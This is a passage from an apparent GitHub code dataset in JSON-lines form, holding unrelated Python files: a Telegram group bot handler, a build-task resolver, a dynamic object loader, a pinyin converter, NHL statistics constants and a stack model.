job_queue)\n return\n\n if msg and msg.entities and nanny.process_url(bot, update, job_queue):\n return\n\n if nanny.nanny_text(bot, user_id, chat_id, message, job_queue):\n return\n\n if text is not None and re.search(\"@admin(?!\\w)\", text) is not None:\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n\n chat_text = support.message_url(message, message.message_id, message.chat.title)\n\n message_text=(\"ℹ️ {}\\n👤 {} ha enviado una alerta a los administradores\\n\\nMensaje: {}\").format(\n chat_text,\n replace_pogo,\n text\n )\n for admin in bot.get_chat_administrators(chat_id):\n user = get_user(admin.user.id)\n if user is not None and user.alerts:\n bot.sendMessage(\n chat_id=admin.user.id,\n text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN,\n disable_web_page_preview=True\n )\n ladmin = get_particular_admin(chat_id)\n if ladmin is not None and ladmin.admin:\n admin = get_admin_from_linked(chat_id)\n if admin is not None and admin.admin and admin.admin_bot:\n config = get_config()\n adm_bot = Bot(token=config[\"telegram\"][\"admin_token\"])\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(chat_text, replace_pogo, text)\n adm_bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN, disable_web_page_preview=True)\n elif admin is not None and admin.admin:\n replace_pogo = support.replace(user_id, message.from_user.first_name, admin=True)\n message_text = (\"ℹ️ {}\\n👤 {} {}\").format(chat_text, replace_pogo, text)\n bot.sendMessage(chat_id=admin.id, text=message_text,\n parse_mode=telegram.ParseMode.MARKDOWN, disable_web_page_preview=True)\n'''\n if text and len(text) < 31:\n commands = get_commands(chat_id)\n if commands is None:\n return\n for command in commands:\n logging.debug(\"%s %s\", text, command)\n if distance(text.lower(), command.command.lower()) < 1:\n logging.debug(\"%s %s\", text, command.command)\n ENUM_FUNC_MAP = {\n Types.TEXT.value: bot.sendMessage,\n Types.BUTTON_TEXT.value: bot.sendMessage,\n Types.STICKER.value: bot.sendSticker,\n Types.DOCUMENT.value: bot.sendDocument,\n Types.PHOTO.value: bot.sendPhoto,\n Types.AUDIO.value: bot.sendAudio,\n Types.VOICE.value: bot.sendVoice,\n Types.VIDEO.value: bot.sendVideo\n }\n if command.command_type != Types.TEXT and command.command_type != Types.BUTTON_TEXT:\n ENUM_FUNC_MAP[command.command_type](chat_id, command.media)\n return\n\n if command.command_type == Types.BUTTON_TEXT:\n buttons = get_cmd_buttons(chat_id)\n keyb = build_keyboard(buttons)\n keyboard = InlineKeyboardMarkup(keyb)\n else:\n keyboard = None\n try:\n msg = update.effective_message.reply_text(\n command.media,\n reply_markup=keyboard,\n parse_mode=telegram.ParseMode.MARKDOWN,\n disable_web_page_preview=True, \n disable_notification=False\n )\n\n except IndexError:\n msg = update.effective_message.reply_text(\n markdown_parser(\n \"\\nBip bop bip: El mensaje tiene errores de\"\n \"Markdown, revisalo y configuralo de nuevo.\"),\n parse_mode=telegram.ParseMode.MARKDOWN)\n except KeyError:\n msg = update.effective_message.reply_text(\n markdown_parser(\n \"\\nBip bop bip: El mensaje tiene errores con\"\n \"las llaves, revisalo y configuralo de nuevo.\"),\n parse_mode=telegram.ParseMode.MARKDOWN)\n return\n'''\n\n\ndef send_alert(bot, chat_id, user_id):\n button_list = [[\n InlineKeyboardButton(text=\"Empezar!\", url=\"https://t.me/ProfDumbledoreBot\")\n ]]\n reply_markup = 
InlineKeyboardMarkup(button_list)\n sent_message = bot.sendMessage(\n chat_id=chat_id,\n text=(\n \"¡Hola mago/a!\\n\\nPara permanecer en este grupo, debes registra\"\n \"rte conmigo: @ProfDumbledoreBot.\\nPara hacerlo, pulsa *Empezar*, inicia el\"\n \" chat privado y sigue los pasos.\"\n ),\n parse_mode=telegram.ParseMode.MARKDOWN,\n reply_markup=reply_markup\n )\n return sent_message\n\n\n","repo_name":"pikaping/ProfesorDumbledoreBot","sub_path":"profdumbledorebot/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":20353,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"27681072335","text":"from typing import List, Dict, Set\nfrom exceptions import UndefinedDependencyException, UndefinedBuildException\n\n\ndef form_map(data: List[Dict]):\n result = dict()\n for task in data:\n result[task.get('name')] = task.get('tasks')\n return result\n\n\ndef add_task_to_list(result_list: List, result_set: Set, task: str):\n if task not in result_set:\n result_set.add(task)\n result_list.append(task)\n\n\ndef form_build_tasks(task_data: Dict[str, List[str]], build_name: str, build_data: Dict[str, List[str]]):\n result_list = []\n result_set = set()\n build_tasks = build_data.get(build_name)\n if build_tasks is None:\n raise UndefinedBuildException(f'Билд {build_name} не обнаружен')\n for task in build_tasks:\n if task not in task_data:\n raise UndefinedDependencyException(f'Билд {build_name}: '\n f'обнаружена несуществующая таска {task}')\n add_task_to_list(result_list, result_set, task)\n for dep in task_data.get(task):\n add_task_to_list(result_list, result_set, dep)\n return {\n 'name': build_name,\n 'tasks': result_list,\n }\n\n","repo_name":"Valll-v/Saber-Interactive-test-task","sub_path":"build_worker.py","file_name":"build_worker.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27518795396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport importlib\nimport logging\nfrom typing import Dict, List, Union\n\n###############################################################################\n\nlog = logging.getLogger(__name__)\n\n###############################################################################\n\n\ndef load_custom_object(\n module_path: Union[str, List[str]], object_name: str, object_kwargs: Dict\n) -> object:\n \"\"\"\n Load a custom object with kwargs.\n\n Parameters\n ----------\n module_path: Union[str, List[str]]\n Python module path or list of path parts to a custom module.\n Ex: \"cptools.pipeline\"\n object_name: str\n Name of the object to retrieve from the module. 
Ex: \"Pipeline\"\n object_kwargs: Dict\n Any kwargs to pass to the object.\n\n Returns\n -------\n obj: object\n The initialized object.\n \"\"\"\n # Convert module path to string\n if isinstance(module_path, list):\n module_path = \".\".join(module_path)\n\n # Load target module\n mod = importlib.import_module(module_path)\n obj = getattr(mod, object_name)\n obj = obj(**object_kwargs)\n\n # Log\n log.debug(f\"Using object: {type(obj)}\")\n\n return obj\n","repo_name":"CouncilDataProject/cdptools_v2","sub_path":"cdptools/dev_utils/load_custom_object.py","file_name":"load_custom_object.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"12798719961","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n Author:cleverdeng\n E-mail:clverdeng@gmail.com\n\"\"\"\n\n__version__ = '0.9'\n__all__ = [\"PinYin\"]\n\nimport os.path\n\n\nclass PinYin(object):\n def __init__(self, dict_file='word.data'):\n self.word_dict = {}\n self.dict_file = dict_file\n\n\n def load_word(self):\n if not os.path.exists(self.dict_file):\n raise IOError(\"NotFoundFile\")\n\n f_obj = open(self.dict_file, \"r\")\n for f_line in f_obj.readlines():\n try:\n line = f_line.split(' ')\n self.word_dict[line[0]] = line[1]\n except:\n line = f_line.split(' ')\n self.word_dict[line[0]] = line[1]\n f_obj.close()\n\n\n def hanzi2pinyin(self, string=\"\"):\n result = []\n if not isinstance(string, type('s')):\n string = string.decode(\"utf-8\")\n \n for char in string:\n key = '%X' % ord(char)\n result.append(self.word_dict.get(key, char).split()[0][:-1].lower())\n\n return result\n\n\n def hanzi2pinyin_split(self, string=\"\", split=\"\"):\n result = self.hanzi2pinyin(string=string)\n if split == \"\":\n return result\n else:\n return split.join(result)\n\n\nconverter = PinYin()\nconverter.load_word()\n\ninput = open(\"tar.txt\", \"r\")\noutput = open(\"py.txt\", \"w\")\nfor line in input:\n line = line[:-1]\n output.write(converter.hanzi2pinyin_split(string=line, split=\" \") + \"\\n\")\n\ninput.close()\noutput.close()\n","repo_name":"alonewithyou/Pinyin-Chinese","sub_path":"prepare/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"6399083449","text":"# Gameplay defines\nglobal TOTAL_POINTS_PER_GAME\nglobal TOTAL_GOALS_PER_GAME\nglobal TOTAL_GOALS_PER_GAME_ES\nglobal TOTAL_GOALS_PER_GAME_PP\nglobal TOTAL_GOALS_PER_GAME_PK\nglobal SCF_SF_FACTOR\nglobal PROBABILITY_FOR_OT\nglobal CURRENT_TEAM\nglobal OPPONENT_TEAM\nglobal SIMULATION_LIGHT\nglobal SIMULATION_EXT\nglobal HT_ADVANTAGE\nglobal AT_ADVANTAGE\nglobal WS_DEF\nglobal WS_CEN\nglobal WS_WNG\nglobal WS_FWD\nTOTAL_POINTS_PER_GAME = 2.1066089693154995\nTOTAL_GOALS_PER_GAME = 5.209284028324154\nTOTAL_GOALS_PER_GAME_ES = 0\nTOTAL_GOALS_PER_GAME_PP = 0\nTOTAL_GOALS_PER_GAME_PK = 0\nSCF_SF_FACTOR = 4.292072174177282\nPROBABILITY_FOR_OT = 0.10660896931549961\nCURRENT_TEAM = ['ht','at']\nOPPONENT_TEAM = ['at','ht']\nSIMULATION_LIGHT = 0\nSIMULATION_EXT = 1\nHT_ADVANTAGE = 1.1878\nAT_ADVANTAGE = 1/HT_ADVANTAGE\nWS_DEF = [1,0.75,0.15] # weighted scale suggestion for defenders\nWS_CEN = [1,1,0.5] # weighted scale suggestion for centers\nWS_WNG = [0.75,1,1] # weighted scale suggestion for wingers\nWS_FWD = [1.25,1.25,0.5]\n\nglobal STAT_ES\nglobal STAT_PP\nglobal STAT_PK\nglobal STAT_INDEX\nSTAT_ES = 0\nSTAT_PP = 1\nSTAT_PK = 2\nSTAT_INDEX = 
[STAT_ES,STAT_PP,STAT_PK]\n\n\nglobal SKATER_BIO_BIT\nglobal SKATER_ES_BIT\nglobal SKATER_PP_BIT\nglobal SKATER_PK_BIT\nglobal SKATER_ON_ICE_BIT\nglobal SKATER_RELATIVE_BIT\nglobal GOALIE_ES_BIT\nglobal GOALIE_PP_BIT\nglobal GOALIE_PK_BIT\nglobal TEAM_ES_BIT\nglobal TEAM_PP_BIT\nglobal TEAM_PK_BIT\nglobal TEAM_HOME_BIT\nglobal TEAM_AWAY_BIT\nglobal UNAVAILABLE_PLAYERS_BIT\nglobal DATABASE_BIT_REGISTER\nglobal CONNECTION_TIMEOUT\n\nSKATER_BIO_BIT = 0\nSKATER_ES_BIT = 1\nSKATER_PP_BIT = 2\nSKATER_PK_BIT = 3\nSKATER_ON_ICE_BIT = 4\nSKATER_RELATIVE_BIT = 5\nGOALIE_ES_BIT = 6\nGOALIE_PP_BIT = 7\nGOALIE_PK_BIT = 8\nTEAM_ES_BIT = 9\nTEAM_PP_BIT = 10\nTEAM_PK_BIT = 11\nTEAM_HOME_BIT = 12\nTEAM_AWAY_BIT = 13\nUNAVAILABLE_PLAYERS_BIT = 14\nDATABASE_BIT_REGISTER = 15*[True]\nCONNECTION_TIMEOUT = 60\t\t\t\t\t\t# Connection will timeout after 60 seconds\n\nglobal GAMEPLAY_ES\nglobal GAMEPLAY_PP_HT\nglobal GAMEPLAY_PP_AT\nglobal GAMEPLAY_PK_HT\nglobal GAMEPLAY_PK_AT\nglobal NO_GOALIE_HT\nglobal NO_GOALIE_AT\nGAMEPLAY_ES = 0\nGAMEPLAY_PP_HT = 1\nGAMEPLAY_PP_AT = 2\nGAMEPLAY_PK_HT = 2\nGAMEPLAY_PK_AT = 1\nNO_GOALIE_HT = 3\nNO_GOALIE_AT = 4\n\nglobal ACTIVE_SKATERS\nglobal ACTIVE_GOALIES\nglobal ACTIVE_PLAYERS\nglobal ACTIVE_TEAMS\nACTIVE_SKATERS = set()\nACTIVE_GOALIES = set()\nACTIVE_PLAYERS = set()\nACTIVE_TEAMS = ['ANA','ARI','BOS','BUF','CAR','CBJ','CGY','CHI','COL','DAL','DET','EDM','FLA','LAK','MIN','MTL','NJD','NSH','NYI','NYR','OTT','PHI','PIT','SJS','STL','TBL','TOR','VAN','VGK','WPG','WSH']\n'''\nSkater Bio-DB from naturalstattrick.com\n,\"Player\",\"Team\",\"Position\",\"Age\",\"Date of Birth\",\n\"Birth City\",\"Birth State/Province\",\"Birth Country\",\n\"Nationality\",\"Height (in)\",\"Weight (lbs)\",\"Draft Year\",\n\"Draft Team\",\"Draft Round\",\"Round Pick\",\"Overall Draft Position\"\n'''\nglobal SKATER_DB_BIO_NAME\nglobal SKATER_DB_BIO_TEAM_ID\nglobal SKATER_DB_BIO_POSITION\nglobal SKATER_DB_BIO_AGE\nglobal SKATER_DB_BIO_DOB\nglobal SKATER_DB_BIO_HEIGHT\nglobal SKATER_DB_BIO_WEIGHT\nglobal SKATER_DB_BIO_DRAFT_YEAR\nglobal SKATER_DB_BIO_DRAFT_TEAM\nglobal SKATER_DB_BIO_DRAFT_ROUND\nglobal SKATER_DB_BIO_ROUND_PICK\nglobal SKATER_DB_BIO_TOTAL_DRAFT_POS\nSKATER_DB_BIO_NAME = 1\nSKATER_DB_BIO_TEAM_ID = 2\nSKATER_DB_BIO_POSITION = 3\nSKATER_DB_BIO_AGE = 4\nSKATER_DB_BIO_DOB = 5\nSKATER_DB_BIO_HEIGHT = 10\nSKATER_DB_BIO_WEIGHT = 11\nSKATER_DB_BIO_DRAFT_YEAR = 12\nSKATER_DB_BIO_DRAFT_TEAM = 13\nSKATER_DB_BIO_DRAFT_ROUND = 14\nSKATER_DB_BIO_ROUND_PICK = 15\nSKATER_DB_BIO_TOTAL_DRAFT_POS = 16\nSKATER_DB_BIO_LENGTH = 17\n\n'''\nSkater Individual-DB, ES, from naturalstattrick.com\n'''\nglobal SKATER_DB_IND_TEAM_ID\nglobal SKATER_DB_IND_TOI\nglobal SKATER_DB_IND_GOALS\nglobal SKATER_DB_IND_ASSIST\nglobal SKATER_DB_IND_FIRST_ASSIST\nglobal SKATER_DB_IND_SECOND_ASSIST\nglobal SKATER_DB_IND_SF\nglobal SKATER_DB_IND_SH_PCG\nglobal SKATER_DB_IND_IXG\nglobal SKATER_DB_IND_ICF\nglobal SKATER_DB_IND_IFF\nglobal SKATER_DB_IND_ISCF\nglobal SKATER_DB_IND_IHDCF\nglobal SKATER_DB_IND_RUSH_ATTEMPTS\nglobal SKATER_DB_IND_REBOUNDS_CREATED\nglobal SKATER_DB_IND_TOTAL_PENALTIES\nglobal SKATER_DB_IND_MINOR\nglobal SKATER_DB_IND_MAJOR\nglobal SKATER_DB_IND_MISCONDUCT\nglobal SKATER_DB_IND_PENALTIES_DRAWN\nglobal SKATER_DB_IND_GIVEAWAYS\nglobal SKATER_DB_IND_TAKEAWAYS\nglobal SKATER_DB_IND_HITS\nglobal SKATER_DB_IND_HITS_TAKEN\nglobal SKATER_DB_IND_SHOTS_BLOCKED\nglobal SKATER_DB_IND_FACEOFFS_WON\nglobal SKATER_DB_IND_FACEOFFS_LOST\nglobal SKATER_DB_IND_FACEOFFS_WON_PCG\nSKATER_DB_IND_TEAM_ID = 2\nSKATER_DB_IND_TOI = 
5\nSKATER_DB_IND_GOALS = 6\nSKATER_DB_IND_ASSIST = 7\nSKATER_DB_IND_FIRST_ASSIST = 8\nSKATER_DB_IND_SECOND_ASSIST = 9\nSKATER_DB_IND_SF = 12\nSKATER_DB_IND_SH_PCG = 13\nSKATER_DB_IND_IXG = 14\nSKATER_DB_IND_ICF = 15\nSKATER_DB_IND_IFF = 16\nSKATER_DB_IND_ISCF = 17\nSKATER_DB_IND_IHDCF = 18\nSKATER_DB_IND_RUSH_ATTEMPTS = 19\nSKATER_DB_IND_REBOUNDS_CREATED = 20\nSKATER_DB_IND_PIM = 21\nSKATER_DB_IND_TOTAL_PENALTIES = 22\nSKATER_DB_IND_MINOR = 23\nSKATER_DB_IND_MAJOR = 24\nSKATER_DB_IND_MISCONDUCT = 25\nSKATER_DB_IND_PENALTIES_DRAWN = 26\nSKATER_DB_IND_GIVEAWAYS = 27\nSKATER_DB_IND_TAKEAWAYS = 28\nSKATER_DB_IND_HITS = 29\nSKATER_DB_IND_HITS_TAKEN = 30\nSKATER_DB_IND_SHOTS_BLOCKED = 31\nSKATER_DB_IND_FACEOFFS_WON = 32\nSKATER_DB_IND_FACEOFFS_LOST = 33\nSKATER_DB_IND_FACEOFFS_WON_PCG = 34\nSKATER_DB_IND_LENGTH = 35\n\n'''\nSkater OnIce-DB from naturalstattrick.com\n'''\nglobal SKATER_DB_ON_ICE_TOI\nglobal SKATER_DB_ON_ICE_GP\nglobal SKATER_DB_ON_ICE_CF\nglobal SKATER_DB_ON_ICE_CA\nglobal SKATER_DB_ON_ICE_CF_PERCENT\nglobal SKATER_DB_ON_ICE_FF\nglobal SKATER_DB_ON_ICE_FA\nglobal SKATER_DB_ON_ICE_FF_PERCENT\nglobal SKATER_DB_ON_ICE_SF\nglobal SKATER_DB_ON_ICE_SA\nglobal SKATER_DB_ON_ICE_SF_PERCENT\nglobal SKATER_DB_ON_ICE_GF\nglobal SKATER_DB_ON_ICE_GA\nglobal SKATER_DB_ON_ICE_GF_PERCENT\nglobal SKATER_DB_ON_ICE_xGF\nglobal SKATER_DB_ON_ICE_xGA\nglobal SKATER_DB_ON_ICE_xGF_PERCENT\nglobal SKATER_DB_ON_ICE_SCF\nglobal SKATER_DB_ON_ICE_SCA\nglobal SKATER_DB_ON_ICE_SCF_PERCENT\nglobal SKATER_DB_ON_ICE_HDCF\nglobal SKATER_DB_ON_ICE_HDCA\nglobal SKATER_DB_ON_ICE_HDCF_PERCENT\nglobal SKATER_DB_ON_ICE_OZS\nglobal SKATER_DB_ON_ICE_NZS\nglobal SKATER_DB_ON_ICE_DZS\nglobal SKATER_DB_ON_ICE_OZS_PERCENT\nglobal SKATER_DB_ON_ICE_OZFO\nglobal SKATER_DB_ON_ICE_NZFO\nglobal SKATER_DB_ON_ICE_DZFO\nglobal SKATER_DB_ON_ICE_OZFO_PERCENT\nSKATER_DB_ON_ICE_GP = 4\nSKATER_DB_ON_ICE_TOI_UL = 5\nSKATER_DB_ON_ICE_CF = 6\nSKATER_DB_ON_ICE_CA = 7\nSKATER_DB_ON_ICE_CF_PERCENT = 8\nSKATER_DB_ON_ICE_FF = 9\nSKATER_DB_ON_ICE_FA = 10\nSKATER_DB_ON_ICE_FF_PERCENT = 11\nSKATER_DB_ON_ICE_SF = 12\nSKATER_DB_ON_ICE_SA = 13\nSKATER_DB_ON_ICE_SF_PERCENT = 14\nSKATER_DB_ON_ICE_GF = 15\nSKATER_DB_ON_ICE_GA = 16\nSKATER_DB_ON_ICE_GF_PERCENT = 17\nSKATER_DB_ON_ICE_xGF = 18\nSKATER_DB_ON_ICE_xGA = 19\nSKATER_DB_ON_ICE_xGF_PERCENT = 20\nSKATER_DB_ON_ICE_SCF = 21\nSKATER_DB_ON_ICE_SCA = 22\nSKATER_DB_ON_ICE_SCF_PERCENT = 23\nSKATER_DB_ON_ICE_HDCF = 24\nSKATER_DB_ON_ICE_HDCA = 25\nSKATER_DB_ON_ICE_HDCF_PERCENT = 26\nSKATER_DB_ON_ICE_OZS = 45\nSKATER_DB_ON_ICE_NZS = 46\nSKATER_DB_ON_ICE_DZS = 47\nSKATER_DB_ON_ICE_OZS_PERCENT = 49\nSKATER_DB_ON_ICE_OZFO = 50\nSKATER_DB_ON_ICE_NZFO = 51\nSKATER_DB_ON_ICE_DZFO = 52\nSKATER_DB_ON_ICE_OZFO_PERCENT = 53\nSKATER_DB_ON_ICE_LENGTH = 54\n\n'''\nRelative stats from naturalstattrick.com\n'''\nglobal SKATER_DB_RELATIVE_NAME\nglobal SKATER_DB_RELATIVE_TEAM_ID\nglobal SKATER_DB_RELATIVE_CF_PER_60\nglobal SKATER_DB_RELATIVE_CA_PER_60\nglobal SKATER_DB_RELATIVE_CF_PCG\nglobal SKATER_DB_RELATIVE_FF_PER_60\nglobal SKATER_DB_RELATIVE_FA_PER_60\nglobal SKATER_DB_RELATIVE_FF_PCG\nglobal SKATER_DB_RELATIVE_SF_PER_60\nglobal SKATER_DB_RELATIVE_SA_PER_60\nglobal SKATER_DB_RELATIVE_SF_PCG\nglobal SKATER_DB_RELATIVE_GF_PER_60\nglobal SKATER_DB_RELATIVE_GA_PER_60\nglobal SKATER_DB_RELATIVE_GF_PCG\nglobal SKATER_DB_RELATIVE_xGF_PER_60\nglobal SKATER_DB_RELATIVE_XGA_PER_60\nglobal SKATER_DB_RELATIVE_xGF_PCG\nglobal SKATER_DB_RELATIVE_SCF_PER_60\nglobal SKATER_DB_RELATIVE_SCA_PER_60\nglobal 
SKATER_DB_RELATIVE_SCF_PCG\nSKATER_DB_RELATIVE_NAME = 1\nSKATER_DB_RELATIVE_TEAM_ID = 2\nSKATER_DB_RELATIVE_CF_PER_60 = 7\nSKATER_DB_RELATIVE_CA_PER_60 = 8\nSKATER_DB_RELATIVE_CF_PCG = 9\nSKATER_DB_RELATIVE_FF_PER_60 = 10\nSKATER_DB_RELATIVE_FA_PER_60 = 11\nSKATER_DB_RELATIVE_FF_PCG = 12\nSKATER_DB_RELATIVE_SF_PER_60 = 13\nSKATER_DB_RELATIVE_SA_PER_60 = 14\nSKATER_DB_RELATIVE_SF_PCG = 15\nSKATER_DB_RELATIVE_GF_PER_60 = 16\nSKATER_DB_RELATIVE_GA_PER_60 = 17\nSKATER_DB_RELATIVE_GF_PCG = 18\nSKATER_DB_RELATIVE_xGF_PER_60 = 19\nSKATER_DB_RELATIVE_XGA_PER_60 = 20\nSKATER_DB_RELATIVE_xGF_PCG = 21\nSKATER_DB_RELATIVE_SCF_PER_60 = 22\nSKATER_DB_RELATIVE_SCA_PER_60 = 23\nSKATER_DB_RELATIVE_SCF_PCG = 24\n'''\nGoalie-DB from naturalstattrick.com\n'''\nglobal GOALIE_DB_NAME\nglobal GOALIE_DB_TEAM_ID\nglobal GOALIE_DB_GP\nglobal GOALIE_DB_TOI\nglobal GOALIE_DB_SA\nglobal GOALIE_DB_SV\nglobal GOALIE_DB_GA\nglobal GOALIE_DB_SV_PCG\nglobal GOALIE_DB_GAA\nglobal GOALIE_DB_GSAA\nglobal GOALIE_DB_XGA\nglobal GOALIE_DB_AVG_SHOT_DIST\nglobal GOALIE_DB_AVG_GOAL_DIST\nGOALIE_DB_NAME = 1\nGOALIE_DB_TEAM_ID = 2\nGOALIE_DB_GP = 3\nGOALIE_DB_TOI = 4\nGOALIE_DB_SA = 5\nGOALIE_DB_SV = 6\nGOALIE_DB_GA = 7\nGOALIE_DB_SV_PCG = 8\nGOALIE_DB_GAA = 9\nGOALIE_DB_GSAA = 10\nGOALIE_DB_XGA = 11\nGOALIE_DB_AVG_SHOT_DIST = 30\nGOALIE_DB_AVG_GOAL_DIST = 31\nGOALIE_DB_LENGTH = 32\n\n'''\nTeam-DB from naturalstattrick.com\nColumns:\n0-10: 0,\"Team\",\"GP\",\"TOI\",\"W\",\"L\",\"OTL\",\"ROW\",\"Points\",\"Point %\",\"CF\",\n11-20: \"CA\",\"CF%\",\"FF\",\"FA\",\"FF%\",\"SF\",\"SA\",\"SF%\",\"GF\",\"GA\",\n21-30: \"GF%\",\"xGF\",\"xGA\",\"xGF%\",\"SCF\",\"SCA\",\"SCF%\",\"SCSF\",\"SCSA\",\"SCSF%\",\n31-40: \"SCGF\",\"SCGA\",\"SCGF%\",\"SCSH%\",\"SCSV%\",\"HDCF\",\"HDCA\",\"HDCF%\",\"HDSF\",\"HDSA\",\n41-50: \"HDSF%\",\"HDGF\",\"HDGA\",\"HDGF%\",\"HDSH%\",\"HDSV%\",\"MDCF\",\"MDCA\",\"MDCF%\",\"MDSF\",\n51-60: \"MDSA\",\"MDSF%\",\"MDGF\",\"MDGA\",\"MDGF%\",\"MDSH%\",\"MDSV%\",\"LDCF\",\"LDCA\",\"LDCF%\",\n61-70: \"LDSF\",\"LDSA\",\"LDSF%\",\"LDGF\",\"LDGA\",\"LDGF%\",\"LDSH%\",\"LDSV%\",\"SH%\",\"SV%\",\n71-80: \"PDO\"\n'''\nglobal TEAM_DB_NAME_COL\nglobal TEAM_DB_GP_COL\nglobal TEAM_DB_TOI_COL\nglobal TEAM_DB_W_COL\nglobal TEAM_DB_L_COL\nglobal TEAM_DB_OTL_COL\nglobal TEAM_DB_ROW_COL\nglobal TEAM_DB_P_COL\nglobal TEAM_DB_P_PCG_COL\nglobal TEAM_DB_CF_COL\nglobal TEAM_DB_CA_COL\nglobal TEAM_DB_CF_PCG_COL\nglobal TEAM_DB_SF_COL\nglobal TEAM_DB_SA_COL\nglobal TEAM_DB_SF_PCG_COL\nglobal TEAM_DB_GF_COL\nglobal TEAM_DB_GA_COL\nglobal TEAM_DB_GF_PCG_COL\nglobal TEAM_DB_FF_COL\nglobal TEAM_DB_FA_COL\nglobal TEAM_DB_FF_PCG_COL\nglobal TEAM_DB_SCF_COL\nglobal TEAM_DB_SCA_COL\nglobal TEAM_DB_SCF_PCG_COL\nglobal TEAM_DB_xGF_COL\nglobal TEAM_DB_xGA_COL\nglobal TEAM_DB_xGF_PCG_COL\nglobal TEAM_DB_HDCF_COL\nglobal TEAM_DB_HDCA_COL\nglobal TEAM_DB_HDCF_PCG_COL\nglobal TEAM_DB_SV_PCG_COL\nglobal TEAM_DB_PDO_COL\nglobal P_PCG_FACTOR\nTEAM_DB_NAME_COL = 1\nTEAM_DB_GP_COL = 2\nTEAM_DB_TOI_COL = 3\nTEAM_DB_W_COL = 4\nTEAM_DB_L_COL = 5\nTEAM_DB_OTL_COL = 6\nTEAM_DB_ROW_COL = 7\nTEAM_DB_P_COL = 8\nTEAM_DB_P_PCG_COL = 9\nTEAM_DB_CF_COL = 10\nTEAM_DB_CA_COL = 11\nTEAM_DB_CF_PCG_COL = 12\nTEAM_DB_FF_COL = 13\nTEAM_DB_FA_COL = 14\nTEAM_DB_FF_PCG_COL = 15\nTEAM_DB_SF_COL = 16\nTEAM_DB_SA_COL = 17\nTEAM_DB_SF_PCG_COL = 18\nTEAM_DB_GF_COL = 19\nTEAM_DB_GA_COL = 20\nTEAM_DB_GF_PCG_COL = 21\nTEAM_DB_xGF_COL = 22\nTEAM_DB_xGA_COL = 23\nTEAM_DB_xGF_PCG_COL = 24\nTEAM_DB_SCF_COL = 25\nTEAM_DB_SCA_COL = 26\nTEAM_DB_SCF_PCG_COL = 27\nTEAM_DB_HDCF_COL = 36\nTEAM_DB_HDCA_COL 
= 37\nTEAM_DB_HDCF_PCG_COL = 38\nTEAM_DB_SV_PCG_COL = 70\nTEAM_DB_PDO_COL = 71\nTEAM_DB_LENGTH = 72\nP_PCG_FACTOR = 0.25 \t\t# This defines how much/little the point% of the season should be weighted in to the rating.","repo_name":"TobiasSolbeckar/nhl","sub_path":"nhl_defines.py","file_name":"nhl_defines.py","file_ext":"py","file_size_in_byte":11400,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70892199505","text":"class StackItem():\n ''' An item on the stack '''\n def __init__(self, width, what):\n self.width = width\n self.what = what\n self.stack = None\n self.blob = None\n\n def __str__(self):\n if self.what is None:\n return \"[-%d-]\" % self.width\n return str([self.width, self.what])\n\nclass StackItemInt(StackItem):\n ''' A 16 bit integer '''\n def __init__(self, val):\n super().__init__(2, \"#\" + str(val))\n self.val = val\n\n def __str__(self):\n return \"[#%d]\" % self.val\n\nclass StackItemLong(StackItem):\n ''' A 32 bit integer '''\n def __init__(self, val):\n super().__init__(4, \"##\" + str(val))\n self.val = val\n\n def __str__(self):\n return \"[##%d]\" % self.val\n\nclass FrameItemReference(StackItem):\n ''' A Pointer to something on the frame'''\n def __init__(self, offset):\n super().__init__(4, \"@@\" + str(offset))\n self.backref = offset\n\n def __str__(self):\n return \"[@@%d]\" % self.backref\n\nclass StackItemReference(StackItem):\n ''' A Pointer to something further up the stack '''\n def __init__(self, offset):\n super().__init__(4, \"^^\" + str(offset))\n self.backref = offset\n\n def __str__(self):\n return \"[^^%d]\" % self.backref\n\nclass StackItemString(StackItem):\n ''' A String on the stack '''\n def __init__(self, text=None):\n super().__init__(4, \"$…\")\n self.text = text\n\n def __str__(self):\n if self.text:\n return \"[$$%s]\" % self.text\n return \"[$$…]\"\n\nclass StackItemBlob(StackItem):\n ''' A pushed object '''\n\n def __init__(self, blob=None, width=None, src=None):\n if blob:\n width = len(blob)\n super().__init__(width, \"**(%d)**\" % width)\n self.blob = blob\n self.src = src\n\n def __str__(self):\n if not self.blob:\n return '[«' + str(self.width) + '»]'\n txt = ''\n if False:\n for i in self.blob:\n if 32 <= i <= 126 and i != 92:\n txt += \"%c\" % i\n else:\n txt += \"\\\\x%02x\" % i\n return '[«%d\"' % self.width + txt + '\"»]'\n\n def __getitem__(self, idx):\n if self.blob:\n return self.blob[idx]\n return None\n\nclass StackItemStringLiteral(StackItem):\n ''' A pushed String Literal '''\n\n def __str__(self):\n return \"[\" + str(self.width) + ', \"' + self.what + '\"]'\n\nclass Stack():\n ''' A model of the stack '''\n def __init__(self):\n self.items = []\n self.mangled = False\n\n def push(self, item):\n ''' Push an item onto the stack '''\n if self.mangled:\n return\n assert isinstance(item.width, int)\n item.stack = self\n if item.what is None and self.items and self.items[-1].what == item.what:\n self.items[-1].width += item.width\n else:\n self.items.append(item)\n\n def pop(self, width):\n ''' Push width worth of items off the stack '''\n if self.mangled:\n return\n while self.items and self.items[-1].width <= width:\n width -= self.items[-1].width\n self.items.pop(-1)\n while width > 0 and self.items:\n last = self.items[-1]\n if last.what is not None:\n last = StackItem(last.width, None)\n last.stack = self\n self.items[-1] = last\n take = min(last.width, width)\n self.items[-1].width -= take\n if self.items[-1].width == 0:\n self.items.pop(-1)\n width -= 
